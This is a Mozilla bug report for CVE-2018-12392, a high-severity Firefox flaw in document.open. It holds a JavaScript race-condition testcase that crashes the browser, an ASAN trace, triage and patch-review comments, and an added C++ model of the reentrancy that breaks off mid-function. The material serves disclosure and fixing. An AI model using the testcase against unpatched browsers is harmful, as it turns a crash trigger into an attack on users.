Bug 1492823 (CVE-2018-12392): js::AssertSameCompartment failure in nsHTMLDocument::Open
Status: Closed, VERIFIED FIXED, target milestone mozilla64
Opened 6 years ago, closed 6 years ago
Categories: Core :: DOM: Core & HTML, defect, P1
People: Reporter: nils, Assigned: smaug
Keywords: csectype-uaf, reporter-external, sec-high
Whiteboard: [post-critsmash-triage][adv-main63+][adv-esr60.3+]
Attachments (5 files):
- 639 bytes, text/html
- 21.89 KB, text/plain
- 656 bytes, text/html
- 2.99 KB, patch (attachment 9012513, dont_unsupress_during_document_open.diff): peterv: review+; RyanVM: approval-mozilla-beta+; abillings: sec-approval+
- 4.39 KB, patch (attachment 9015291, dont_unsupress_during_document_open_esr60.diff): peterv: review+; RyanVM: approval-mozilla-esr60+
The following testcase crashes the latest ASAN build of Firefox 64.0a1 (BuildID=20180919100043). It looks like we have to win a race to trigger the issue, so it might require a few reloads/restarts.
<script>
// Spin a nested event loop on the main thread: a synchronous XHR blocks in
// send() while Gecko keeps processing events (see the SpinEventLoopUntil
// frames in the stack below), so other handlers run inside this call.
function spin() {
  var x = new XMLHttpRequest();
  x.open("POST", "https://mozilla.org", false);
  try { x.send("X"); } catch (e) {}
}
function start() {
  reloadurl = location.href;
  o707 = window.document;
  // ws://0.0.0.0 cannot connect, so its error event fires shortly afterwards.
  o715 = new WebSocket("ws://0.0.0.0");
  o731 = o707.createElement('template');
  o707.onfocus = fun1;
  o715.onerror = fun0;
  spin();
}
// Runs from the WebSocket error event inside the nested loop. writeln()
// implicitly calls document.open(), which replaces the inner window; before
// the fix that path unsuppressed event handling and fired the delayed focus
// event (FreeInnerObjects -> UnsuppressEventHandlingAndFireEvents below).
function fun0() {
  o707.writeln("x");
}
// Runs from that delayed focus event while the first document.open() is
// still on the stack; the second open() ends in ReparentWrapper, where the
// compartment check fails.
function fun1() {
  x = o731.content;
  o707.execCommand('subscript', false, null);
  o707.open();
  // Reload to retry the race.
  window.top.setTimeout("window.top.location.href='" + reloadurl + "'", 400);
}
</script>
<body onload="start()"></body>
ASAN output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28511==ERROR: AddressSanitizer: ILL on unknown address 0x55b844692b1f (pc 0x55b844692b1f bp 0x7ffd03e5ea70 sp 0x7ffd03e5e900 T0)
#0 0x55b844692b1e in MOZ_CrashPrintf /builds/worker/workspace/build/src/mfbt/Assertions.cpp
#1 0x7eff42067828 in fail /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:52:9
#2 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:68
#3 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:82
#4 0x7eff42067828 in checkImpl<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:194
#5 0x7eff42067828 in check<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:203
#6 0x7eff42067828 in js::AssertSameCompartment(JSContext*, JSObject*) /builds/worker/workspace/build/src/js/src/jsfriendapi.cpp:418
#7 0x7eff3a1724dd in mozilla::dom::ReparentWrapper(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2279:3
#8 0x7eff3aeb9ee3 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1532:11
#9 0x7eff39b73a75 in mozilla::dom::HTMLDocument_Binding::open(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:215:53
#10 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
#11 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
#12 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
#13 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
#14 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
#15 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
#16 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
#17 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
#18 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
#19 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
#20 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#21 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
#22 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
#23 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
#24 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
#25 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
#26 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
#27 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
#28 0x7eff3727d8e1 in FocusBlurEvent::Run() /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2077:12
#29 0x7eff36c18186 in AddScriptRunner /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5674:13
#30 0x7eff36c18186 in nsContentUtils::AddScriptRunner(nsIRunnable*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5681
#31 0x7eff371bb3e3 in nsFocusManager::FireFocusOrBlurEvent(mozilla::EventMessage, nsIPresShell*, nsISupports*, bool, bool, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2250:5
#32 0x7eff371ba714 in nsFocusManager::FireDelayedEvents(nsIDocument*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1081:9
#33 0x7eff3714d537 in FireOrClearDelayedEvents(nsTArray<nsCOMPtr<nsIDocument> >&, bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9016:11
#34 0x7eff3714cd10 in nsIDocument::UnsuppressEventHandlingAndFireEvents(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9332:5
#35 0x7eff36cca940 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:1211:13
#36 0x7eff36d4a455 in nsGlobalWindowOuter::SetNewDocument(nsIDocument*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:1973:19
#37 0x7eff3aeb9b20 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1498:22
#38 0x7eff3aebebb4 in nsHTMLDocument::WriteCommon(JSContext*, nsTSubstring<char16_t> const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1768:38
#39 0x7eff3aebdc20 in nsHTMLDocument::WriteCommon(JSContext*, mozilla::dom::Sequence<nsTString<char16_t> > const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1686:5
#40 0x7eff39b77c81 in mozilla::dom::HTMLDocument_Binding::writeln(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:421:9
#41 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
#42 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
#43 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
#44 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
#45 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
#46 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
#47 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
#48 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
#49 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
#50 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
#51 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#52 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
#53 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
#54 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
#55 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
#56 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
#57 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
#58 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
#59 0x7eff3a991ea6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
#60 0x7eff3a945dc0 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:185:5
#61 0x7eff3a9ba039 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:213:13
#62 0x7eff3ca34422 in mozilla::dom::WebSocket::CreateAndDispatchSimpleEvent(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1955:3
#63 0x7eff3ca434c9 in mozilla::dom::WebSocketImpl::DispatchConnectionCloseEvents() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1920:18
#64 0x7eff3ca47bb7 in mozilla::dom::CallDispatchConnectionCloseEvents::Run() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:262:21
#65 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
#66 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
#67 0x7eff3c927bb2 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:334:25
#68 0x7eff3c927bb2 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937
#69 0x7eff3c925b80 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2768:11
#70 0x7eff39412c7f in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1277:9
#71 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
#72 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
#73 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
#74 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
#75 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
#76 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
#77 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
#78 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
#79 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
#80 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
#81 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#82 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
#83 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
#84 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
#85 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
#86 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
#87 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
#88 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
#89 0x7eff3d5cbed8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1167:7
#90 0x7eff40438f83 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7089:21
#91 0x7eff40433ff7 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6882:7
#92 0x7eff4043d447 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
#93 0x7eff357eddd5 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1309:3
#94 0x7eff357ec9bc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:852:14
#95 0x7eff357e84a9 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:741:9
#96 0x7eff357ead82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:627:5
#97 0x7eff357ec4e4 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
#98 0x7eff331cc492 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
#99 0x7eff37141107 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8471:18
#100 0x7eff37141107 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8393
#101 0x7eff3711adfb in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5252:3
#102 0x7eff372871cb in applyImpl<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1178:12
#103 0x7eff372871cb in apply<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1184
#104 0x7eff372871cb in mozilla::detail::RunnableMethodImpl<nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1229
#105 0x7eff32f0e3e5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
#106 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
#107 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
#108 0x7eff3415ec33 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#109 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
#110 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
#111 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
#112 0x7eff3cd4d5a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#113 0x7eff411dedde in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:939:22
#114 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
#115 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
#116 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
#117 0x7eff411ddf03 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:765:34
#118 0x55b84461fb91 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
#119 0x55b84461fb91 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
#120 0x7eff550bdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#121 0x55b84454ef3c in _start (/home/nils/fuzzer3/firefox/firefox+0x2cf3c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ILL /builds/worker/workspace/build/src/mfbt/Assertions.cpp in MOZ_CrashPrintf
==28511==ABORTING
Comment 2•6 years ago
compartment mismatch during wrapper reparenting
Group: core-security → dom-core-security
Keywords: csectype-uaf,
sec-high
Comment 3•6 years ago
Jason, can you see if there could be something that needs fixing in XHR/Web Sockets here?
Component: DOM: Core & HTML → DOM: Networking
Flags: needinfo?(jduell.mcbugs)
Priority: -- → P1
Comment 4•6 years ago
I think this is unlikely to be related to XHR. The reason XHR is on the stack is that that's one of the ways that web content can trigger a nested event loop (which is presumably part of the issue here). We need somebody familiar with XPConnect / dom bindings to investigate.
Flags: needinfo?(jduell.mcbugs) → needinfo?(overholt)
Updated•6 years ago (Assignee)
Assignee: nobody → bugs
Component: DOM: Networking → DOM
Comment 5•6 years ago (Assignee)
Nothing to do with XPConnect or dom bindings either ;)
This is about document.open and replacing inner window and such.
Comment 6•6 years ago (Assignee)
This seems to crash pretty reliably even on debug build (non-asan), at least when loaded from a local file.
Comment 7•6 years ago (Assignee)
oh, this is a bit more fun than I thought. This is about template's document, and
related to https://bugzilla.mozilla.org/show_bug.cgi?id=1022869
Comment 8•6 years ago (Assignee)
We need at least this. Fixes the crash.
I will file a new bug about other issues
Attachment #9012513 -
Flags: review?(peterv)
Updated•6 years ago
Flags: needinfo?(overholt)
Comment 9•6 years ago
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
Review of attachment 9012513 [details] [diff] [review]:
-----------------------------------------------------------------
::: dom/base/nsGlobalWindowInner.cpp
@@ +1148,5 @@
> }
> }
>
> void
> +nsGlobalWindowInner::FreeInnerObjects(bool aForDocumentOpen)
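Review bot: no documentation of the new bool parameter on FreeInnerObjects appears in this hunk, so call sites will read as FreeInnerObjects(true) with no hint of what the special case is. A one-line comment at the declaration stating that the flag skips unsuppressing event handling during document.open (the behaviour the patch name dont_unsupress_during_document_open.diff describes), or an enum in place of the bare bool, would keep the intent readable outside this bug.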
Maybe name this aUnsuppressEventHandling (reversing the values of course)?
Attachment #9012513 -
Flags: review?(peterv) → review+
Comment 10•6 years ago (Assignee)
I actually wanted to use aForDocumentOpen since I expect that others might need it too.
And it is, IMO, easier to understand why such a special case is happening.
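The reentrancy the aForDocumentOpen flag closes, as an added toy model in C++ that is not Gecko code and not taken from this bug's patch: the Window and Document structs, the valid flag, the reentrantOpens counter and the way pending events migrate to the new document are assumptions of the model, chosen only to mirror the shape of the stack above (Open -> FreeInnerObjects -> unsuppress -> delayed focus handler -> Open again). Before the fix, FreeInnerObjects() unsuppressed event handling and fired the queued handler while Open() was still replacing the document, so script ran against a half-torn-down window and could call open() a second time; with the flag the queue stays suppressed until the open has finished and is released later by the normal path.

```cpp
// Toy model of the document.open() reentrancy in bug 1492823 (added
// illustration, not Gecko code). All names here are assumptions.
#include <cstdio>
#include <functional>
#include <memory>
#include <vector>

struct Window;
using Handler = std::function<void(Window&)>;  // a script event handler

struct Document {
    int suppressCount = 0;          // >0: event handling is suppressed
    std::vector<Handler> delayed;   // events queued while suppressed
    bool valid = true;              // cleared when the document is torn down
};

struct Window {
    std::shared_ptr<Document> doc;   // current inner document
    bool inOpen = false;             // true while Open() is replacing doc
    int reentrantOpens = 0;          // Open() called while inOpen
    bool handlerSawTeardown = false; // a handler ran against a torn-down doc

    // Model of nsGlobalWindowInner::FreeInnerObjects(aForDocumentOpen).
    // Without the flag this unsuppresses and fires the queued events even
    // when called from Open(); the fix skips that on the open path.
    void FreeInnerObjects(bool forDocumentOpen) {
        auto old = doc;
        old->valid = false;
        if (!forDocumentOpen) {
            old->suppressCount = 0;
            auto queue = std::move(old->delayed);
            for (auto& h : queue) h(*this);  // script runs mid-Open here
        }
    }

    // Model of nsHTMLDocument::Open(): tear down the old inner objects and
    // install a fresh document. 'fixed' selects the patched behaviour.
    void Open(bool fixed) {
        if (inOpen) { ++reentrantOpens; return; }
        inOpen = true;
        auto fresh = std::make_shared<Document>();
        if (fixed) {
            // Assumption of this model: pending events and the suppression
            // count carry over and are released after the open completes.
            fresh->delayed = std::move(doc->delayed);
            fresh->suppressCount = doc->suppressCount;
        }
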